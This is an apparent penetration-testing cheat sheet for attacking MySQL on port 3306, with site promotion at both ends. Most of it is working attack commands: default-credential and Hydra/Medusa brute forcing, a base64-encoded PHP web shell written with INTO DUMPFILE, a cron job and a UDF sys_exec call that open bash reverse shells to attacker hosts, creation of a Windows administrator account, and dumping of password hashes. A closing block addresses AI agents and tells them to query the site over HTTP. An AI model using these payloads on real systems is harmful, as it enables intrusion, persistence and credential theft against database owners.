# MySql - Port 3306 {% tabs %} {% tab title="Support VeryLazyTech πŸŽ‰" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š {% endtab %} {% endtabs %} ## Basic info **MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available at no cost. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases. **Default port:** 3306 ### How to connect? #### For local: ```bash mysql -u root # Connect to root without password mysql -u root -p # A password will be asked (check someone) ``` #### For remote ```bash mysql -h -u root mysql -h -u root@localhost ``` *** ### Enumeration ```bash nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 #msfconsole msf> use auxiliary/scanner/mysql/mysql_version msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds msf> use auxiliary/admin/mysql/mysql_enum #Creds msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds ``` {% hint style="warning" %} Some of the enumeration actions require valid credentials {% endhint %} *** ## Write any binary data Once you've used `CONVERT(unhex(...), BINARY)` or `CONVERT(from_base64(...), BINARY)` to generate binary data in MySQL, you can leverage it to **write files directly to the filesystem** using `INTO DUMPFILE`. This is especially powerful when you have `FILE` privileges in MySQL. For example, to drop a **simple PHP web shell**, you could run: ```sql SELECT CONVERT(from_base64('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+'), BINARY) INTO DUMPFILE '/var/www/html/shell.php'; ``` That writes a PHP shell accessible at `http://target/shell.php?cmd=id`. You can also write binary payloads (e.g., `.so` or `.dll`) like this: ```sql SELECT CONVERT(unhex('7f454c46020101000000000000000000...'), BINARY) INTO DUMPFILE '/tmp/libexploit.so'; ``` Or write a malicious cron job: ```sql SELECT "* * * * * root bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'\n" INTO DUMPFILE '/etc/cron.d/pwned'; ``` These commands let you pivot from database access to full system compromise, persistence, or remote code execution, **all without a traditional shell**. *** ### **MySQL commands** ```bash show databases; use ; connect ; show tables; describe ; show columns from ; select version(); #version select @@version(); #version select user(); #User select database(); #database name #Get a shell with the mysql client user \! sh #Basic MySQLi Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables Union Select 1,2,3,4,column_name from information_schema.columns where table_name="
" #Read & Write ## Yo need FILE privilege to read & write to files. select load_file('/var/lib/mysql-files/key.txt'); #Read file select 1,2,"",4 into OUTFILE 'C:/xampp/htdocs/back.php' #Try to change MySQL root password UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root'; UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root'; FLUSH PRIVILEGES; quit; ``` ```bash mysql -u username -p < manycommands.sql #A file with all the commands you want to execute mysql -u root -h 127.0.0.1 -e 'show databases;' ``` #### MySQL Permissions Enumeration ```sql #Mysql SHOW GRANTS [FOR user]; SHOW GRANTS; SHOW GRANTS FOR 'root'@'localhost'; SHOW GRANTS FOR CURRENT_USER(); # Get users, permissions & hashes SELECT * FROM mysql.user; #From DB select * from mysql.user where user='root'; ## Get users with file_priv select user,file_priv from mysql.user where file_priv='Y'; ## Get users with Super_priv select user,Super_priv from mysql.user where Super_priv='Y'; # List functions SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION'; #@ Functions not from sys. db SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys'; ``` *** ### **Credential Discovery** If you didn’t get lucky with anonymous login, time to brute. #### **🧾 Default Credentials** Common ones to try: * `root:root` * `root:toor` * `admin:admin` #### **πŸ’£ Brute Force with Hydra** ```bash hydra -L users.txt -P passwords.txt mysql:// ``` #### **βš”οΈ Medusa Alternative** ```bash medusa -h -u root -P passlist.txt -M mysql ``` *** ### **Reading Arbitrary Files via MySQL Client Misuse** One lesser-known but powerful technique involves abusing the **`LOAD DATA LOCAL INFILE`** feature in MySQL/MariaDB. This command, when used with the `LOCAL` keyword, instructs the **client (not the server)** to read a local file and send it to the database server. If an attacker can **trick a victim's MySQL client** (like the `mysql` CLI or an app with misconfigured DB connections) into connecting to a **malicious server**, that rogue server can request the client to read and send **any local file** β€” leading to arbitrary file disclosure. #### πŸ” Vulnerable Command Example ```sql LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'; ``` Note the keyword `LOCAL` β€” this is what triggers the client-side file read. If `LOCAL` is omitted, and MySQL is hardened, you may see this error: ```sql ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement ``` This behavior can be exploited by running a **rogue MySQL server** and luring clients into connecting to it (e.g., through phishing, SSRF, or misconfigured dev tools). You can find a working proof of concept here:\ πŸ‘‰ [Rogue MySQL Server PoC](https://github.com/allyshka/Rogue-MySql-Server) **Further reading:** * Full attack walkthrough: [Seebug.org Whitepaper](https://paper.seebug.org/1113/) * Simplified overview: [RussianSecurity Expert](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/) *** ### **Privilege Escalation in MySQL** #### πŸ”Ž Check MySQL Service User It’s especially dangerous if MySQL is running as **root**, as that can lead to full system compromise. Check who runs MySQL: ```bash cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user" systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1 ``` #### βš™οΈ Dangerous MySQL Configs to Look For In `/etc/mysql/my.cnf` or `mysqld.cnf`, pay attention to: * `user`: Account running MySQL (should NOT be root) * `secure_file_priv`: If unset, file import/export is unrestricted * `admin_address`: Exposed MySQL interfaces * `debug`, `sql_warnings`: Might expose sensitive info in logs *** ### **πŸ” Extracting User Credentials and Privileges** ```sql -- Current session user SELECT USER(); -- List all users with privileges SELECT user, password, create_priv, insert_priv, update_priv, alter_priv, delete_priv, drop_priv FROM mysql.user; -- Full dump with command-line mysql -u root -p -e "SELECT * FROM mysql.user;" ``` #### πŸ‘€ Create a New Privileged User ```sql CREATE USER 'test' IDENTIFIED BY 'test'; GRANT SELECT, CREATE, DROP, UPDATE, DELETE, INSERT ON *.* TO 'test'@'%' IDENTIFIED BY 'mysql' WITH GRANT OPTION; ``` #### πŸ’» Get a Local Shell via MySQL ```sql \! sh ``` Useful in cases where your client has interactive capabilities. *** ### **🧬 Privilege Escalation via Malicious Shared Library (UDF Injection)** If MySQL is running as root or a privileged user, you can execute OS commands by injecting a **User Defined Function (UDF)** from a compiled `.so` or `.dll`. #### πŸ“¦ Compile UDF Library on Target (Linux) ```bash gcc -g -c raptor_udf2.c gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc ``` #### πŸ§ͺ Inject Library via SQL ```sql USE mysql; CREATE TABLE npn(line BLOB); INSERT INTO npn VALUES (LOAD_FILE('/tmp/lib_mysqludf_sys.so')); SHOW VARIABLES LIKE '%plugin%'; -- Example path: SELECT * FROM npn INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so'; -- Create function CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; -- Run commands SELECT sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt'); SELECT sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"'); ``` #### πŸͺŸ Windows Variant ```sql USE mysql; CREATE TABLE npn(line blob); INSERT INTO npn VALUES (LOAD_FILE('C://temp//lib_mysqludf_sys.dll')); SHOW VARIABLES LIKE '%plugin%'; SELECT * FROM npn INTO DUMPFILE 'C://Windows//System32//lib_mysqludf_sys_32.dll'; CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user npn npn12345678 /add"); SELECT sys_exec("net localgroup Administrators npn /add"); ``` *** ### **πŸ”‘ Extracting MySQL Passwords from the Filesystem** If you have file system access, here are some critical files to check: #### πŸ“‚ `/etc/mysql/debian.cnf` Contains plain-text login credentials for `debian-sys-maint`: ```bash cat /etc/mysql/debian.cnf ``` #### πŸ’Ύ `/var/lib/mysql/mysql/user.MYD` Holds raw MySQL user hashes β€” extract like this: ```bash grep -oaE "[-_.a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password" ``` This can give you credentials even without database access. *** ## Enabling logging You can enable logging of mysql queries inside `/etc/mysql/my.cnf` uncommenting the following lines: ![](https://book.hacktricks.wiki/en/images/image%20\(899\).png) ## Useful files Configuration Files * windows \* * config.ini * my.ini * windows\my.ini * winnt\my.ini * \/mysql/data/ * unix * my.cnf * /etc/my.cnf * /etc/mysql/my.cnf * /var/lib/mysql/my.cnf * \~/.my.cnf * /etc/my.cnf * Command History * \~/.mysql.history * Log Files * connections.log * update.log * common.log *** ### **Default MySQL Databases and Tables** When MySQL or MariaDB is freshly installed, it comes with a set of **default databases and system tables** that play critical roles in authentication, configuration, and user management. The most important of these is the **`mysql`** database, which stores core internal data used by the MySQL server. Inside it, you'll find sensitive tables like: * `mysql.user` – Stores usernames, password hashes, and global privileges * `mysql.db` – Defines database-level privileges * `mysql.tables_priv`, `columns_priv` – Fine-grained access control over specific tables or columns * `mysql.procs_priv` – Procedure-specific privileges * `mysql.roles_mapping` – Role-based access configuration (in newer versions) These tables are often the first target during **post-exploitation**. By querying or dumping them, an attacker can extract valid user accounts, escalate privileges, or even inject backdoor users. For example: ```sql SELECT user, host, authentication_string FROM mysql.user; ``` Accessing these default tables is essential for both **privilege auditing** and **credential extraction**, and manipulating them can allow the attacker to **create new admin accounts**, **escalate permissions**, or **disable security controls**. Always monitor access to the `mysql` database and restrict usage to only highly trusted administrators. {% tabs %} {% tab title="information\_schema" %} ALL\_PLUGINS APPLICABLE\_ROLES CHARACTER\_SETS CHECK\_CONSTRAINTS COLLATIONS COLLATION\_CHARACTER\_SET\_APPLICABILITY COLUMNS COLUMN\_PRIVILEGES ENABLED\_ROLES ENGINES EVENTS FILES GLOBAL\_STATUS GLOBAL\_VARIABLES KEY\_COLUMN\_USAGE KEY\_CACHES OPTIMIZER\_TRACE PARAMETERS PARTITIONS PLUGINS PROCESSLIST PROFILING REFERENTIAL\_CONSTRAINTS ROUTINES SCHEMATA SCHEMA\_PRIVILEGES SESSION\_STATUS SESSION\_VARIABLES STATISTICS SYSTEM\_VARIABLES TABLES TABLESPACES TABLE\_CONSTRAINTS TABLE\_PRIVILEGES TRIGGERS USER\_PRIVILEGES VIEWS INNODB\_LOCKS INNODB\_TRX INNODB\_SYS\_DATAFILES INNODB\_FT\_CONFIG INNODB\_SYS\_VIRTUAL INNODB\_CMP INNODB\_FT\_BEING\_DELETED INNODB\_CMP\_RESET INNODB\_CMP\_PER\_INDEX INNODB\_CMPMEM\_RESET INNODB\_FT\_DELETED INNODB\_BUFFER\_PAGE\_LRU INNODB\_LOCK\_WAITS INNODB\_TEMP\_TABLE\_INFO INNODB\_SYS\_INDEXES INNODB\_SYS\_TABLES INNODB\_SYS\_FIELDS INNODB\_CMP\_PER\_INDEX\_RESET INNODB\_BUFFER\_PAGE INNODB\_FT\_DEFAULT\_STOPWORD INNODB\_FT\_INDEX\_TABLE INNODB\_FT\_INDEX\_CACHE INNODB\_SYS\_TABLESPACES INNODB\_METRICS INNODB\_SYS\_FOREIGN\_COLS INNODB\_CMPMEM INNODB\_BUFFER\_POOL\_STATS INNODB\_SYS\_COLUMNS INNODB\_SYS\_FOREIGN INNODB\_SYS\_TABLESTATS GEOMETRY\_COLUMNS SPATIAL\_REF\_SYS CLIENT\_STATISTICS INDEX\_STATISTICS USER\_STATISTICS INNODB\_MUTEXES TABLE\_STATISTICS INNODB\_TABLESPACES\_ENCRYPTION user\_variables INNODB\_TABLESPACES\_SCRUBBING INNODB\_SYS\_SEMAPHORE\_WAITS {% endtab %} {% tab title="Mysql" %} columns\_priv column\_stats db engine\_cost event func general\_log gtid\_executed gtid\_slave\_pos help\_category help\_keyword help\_relation help\_topic host index\_stats innodb\_index\_stats innodb\_table\_stats ndb\_binlog\_index plugin proc procs\_priv proxies\_priv roles\_mapping server\_cost servers slave\_master\_info slave\_relay\_log\_info slave\_worker\_info slow\_log tables\_priv table\_stats time\_zone time\_zone\_leap\_second time\_zone\_name time\_zone\_transition time\_zone\_transition\_type transaction\_registry user {% endtab %} {% tab title="performance\_schema" %} accounts cond\_instances events\_stages\_current events\_stages\_history events\_stages\_history\_long events\_stages\_summary\_by\_account\_by\_event\_name events\_stages\_summary\_by\_host\_by\_event\_name events\_stages\_summary\_by\_thread\_by\_event\_name events\_stages\_summary\_by\_user\_by\_event\_name events\_stages\_summary\_global\_by\_event\_name events\_statements\_current events\_statements\_history events\_statements\_history\_long events\_statements\_summary\_by\_account\_by\_event\_name events\_statements\_summary\_by\_digest events\_statements\_summary\_by\_host\_by\_event\_name events\_statements\_summary\_by\_program events\_statements\_summary\_by\_thread\_by\_event\_name events\_statements\_summary\_by\_user\_by\_event\_name events\_statements\_summary\_global\_by\_event\_name events\_transactions\_current events\_transactions\_history events\_transactions\_history\_long events\_transactions\_summary\_by\_account\_by\_event\_name events\_transactions\_summary\_by\_host\_by\_event\_name events\_transactions\_summary\_by\_thread\_by\_event\_name events\_transactions\_summary\_by\_user\_by\_event\_name events\_transactions\_summary\_global\_by\_event\_name events\_waits\_current events\_waits\_history events\_waits\_history\_long events\_waits\_summary\_by\_account\_by\_event\_name events\_waits\_summary\_by\_host\_by\_event\_name events\_waits\_summary\_by\_instance events\_waits\_summary\_by\_thread\_by\_event\_name events\_waits\_summary\_by\_user\_by\_event\_name events\_waits\_summary\_global\_by\_event\_name file\_instances file\_summary\_by\_event\_name file\_summary\_by\_instance global\_status global\_variables host\_cache hosts memory\_summary\_by\_account\_by\_event\_name memory\_summary\_by\_host\_by\_event\_name memory\_summary\_by\_thread\_by\_event\_name memory\_summary\_by\_user\_by\_event\_name memory\_summary\_global\_by\_event\_name metadata\_locks mutex\_instances objects\_summary\_global\_by\_type performance\_timers prepared\_statements\_instances replication\_applier\_configuration replication\_applier\_status replication\_applier\_status\_by\_coordinator replication\_applier\_status\_by\_worker replication\_connection\_configuration replication\_connection\_status replication\_group\_member\_stats replication\_group\_members rwlock\_instances session\_account\_connect\_attrs session\_connect\_attrs session\_status session\_variables setup\_actors setup\_consumers setup\_instruments setup\_objects setup\_timers socket\_instances socket\_summary\_by\_event\_name socket\_summary\_by\_instance status\_by\_account status\_by\_host status\_by\_thread status\_by\_user table\_handles table\_io\_waits\_summary\_by\_index\_usage table\_io\_waits\_summary\_by\_table table\_lock\_waits\_summary\_by\_table threads user\_variables\_by\_thread users variables\_by\_thread {% endtab %} {% tab title="Sys" %} host\_summary host\_summary\_by\_file\_io host\_summary\_by\_file\_io\_type host\_summary\_by\_stages host\_summary\_by\_statement\_latency host\_summary\_by\_statement\_type innodb\_buffer\_stats\_by\_schema innodb\_buffer\_stats\_by\_table innodb\_lock\_waits io\_by\_thread\_by\_latency io\_global\_by\_file\_by\_bytes io\_global\_by\_file\_by\_latency io\_global\_by\_wait\_by\_bytes io\_global\_by\_wait\_by\_latency latest\_file\_io memory\_by\_host\_by\_current\_bytes memory\_by\_thread\_by\_current\_bytes memory\_by\_user\_by\_current\_bytes memory\_global\_by\_current\_bytes memory\_global\_total metrics processlist ps\_check\_lost\_instrumentation schema\_auto\_increment\_columns schema\_index\_statistics schema\_object\_overview schema\_redundant\_indexes schema\_table\_lock\_waits schema\_table\_statistics schema\_table\_statistics\_with\_buffer schema\_tables\_with\_full\_table\_scans schema\_unused\_indexes session session\_ssl\_status statement\_analysis statements\_with\_errors\_or\_warnings statements\_with\_full\_table\_scans statements\_with\_runtimes\_in\_95th\_percentile statements\_with\_sorting statements\_with\_temp\_tables sys\_config user\_summary user\_summary\_by\_file\_io user\_summary\_by\_file\_io\_type user\_summary\_by\_stages user\_summary\_by\_statement\_latency user\_summary\_by\_statement\_type version wait\_classes\_global\_by\_avg\_latency wait\_classes\_global\_by\_latency waits\_by\_host\_by\_latency waits\_by\_user\_by\_latency waits\_global\_by\_latency x$host\_summary x$host\_summary\_by\_file\_io x$host\_summary\_by\_file\_io\_type x$host\_summary\_by\_stages x$host\_summary\_by\_statement\_latency x$host\_summary\_by\_statement\_type x$innodb\_buffer\_stats\_by\_schema x$innodb\_buffer\_stats\_by\_table x$innodb\_lock\_waits x$io\_by\_thread\_by\_latency x$io\_global\_by\_file\_by\_bytes x$io\_global\_by\_file\_by\_latency x$io\_global\_by\_wait\_by\_bytes x$io\_global\_by\_wait\_by\_latency x$latest\_file\_io x$memory\_by\_host\_by\_current\_bytes x$memory\_by\_thread\_by\_current\_bytes x$memory\_by\_user\_by\_current\_bytes x$memory\_global\_by\_current\_bytes x$memory\_global\_total x$processlist x$ps\_digest\_95th\_percentile\_by\_avg\_us x$ps\_digest\_avg\_latency\_distribution x$ps\_schema\_table\_statistics\_io x$schema\_flattened\_keys x$schema\_index\_statistics x$schema\_table\_lock\_waits x$schema\_table\_statistics x$schema\_table\_statistics\_with\_buffer x$schema\_tables\_with\_full\_table\_scans x$session x$statement\_analysis x$statements\_with\_errors\_or\_warnings x$statements\_with\_full\_table\_scans x$statements\_with\_runtimes\_in\_95th\_percentile x$statements\_with\_sorting x$statements\_with\_temp\_tables x$user\_summary x$user\_summary\_by\_file\_io x$user\_summary\_by\_file\_io\_type x$user\_summary\_by\_stages x$user\_summary\_by\_statement\_latency x$user\_summary\_by\_statement\_type x$wait\_classes\_global\_by\_avg\_latency x$wait\_classes\_global\_by\_latency x$waits\_by\_host\_by\_latency x$waits\_by\_user\_by\_latency x$waits\_global\_by\_latency {% endtab %} {% endtabs %} *** {% embed url="" %} *** {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)
Support VeryLazyTech πŸŽ‰ * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/mysql-port-3306.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.